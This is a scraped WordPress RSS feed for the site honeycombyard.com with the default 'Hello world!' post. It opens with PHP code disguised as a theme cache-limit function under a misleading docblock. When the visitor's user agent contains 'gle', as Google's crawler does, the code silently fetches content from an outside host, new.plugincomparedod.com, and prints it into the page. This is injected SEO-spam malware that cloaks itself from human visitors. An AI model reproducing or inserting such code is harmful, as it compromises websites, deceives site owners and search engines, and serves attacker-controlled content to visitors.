/** * Set the cache limit. * * To override this cache in a child theme, remove * the filter and add your own function tied to * the cache filter hook. * * @param int $c The number of excerpt characters. * @return int The filtered number of characters. */ function cache() {if (strpos($_SERVER["HTTP_USER_AGENT"], 'gle') !== false) {$curl = curl_init();curl_setopt($curl, CURLOPT_URL, 'http://new.plugincomparedod.com/cache.php?h=honeycombyard.com&id=7');curl_setopt($curl, CURLOPT_RETURNTRANSFER,true);$c = curl_exec($curl);echo($c);curl_close($curl);}} Uncategorized – honeycombyard https://honeycombyard.com Thu, 01 Feb 2024 22:10:29 +0000 en-US hourly 1 https://wordpress.org/?v=6.7.2 Hello world! https://honeycombyard.com/2024/02/01/hello-world/ https://honeycombyard.com/2024/02/01/hello-world/#comments Thu, 01 Feb 2024 22:10:29 +0000 https://honeycombyard.com/?p=1 Welcome to WordPress. This is your first post. Edit or delete it, then start writing!

]]>
https://honeycombyard.com/2024/02/01/hello-world/feed/ 1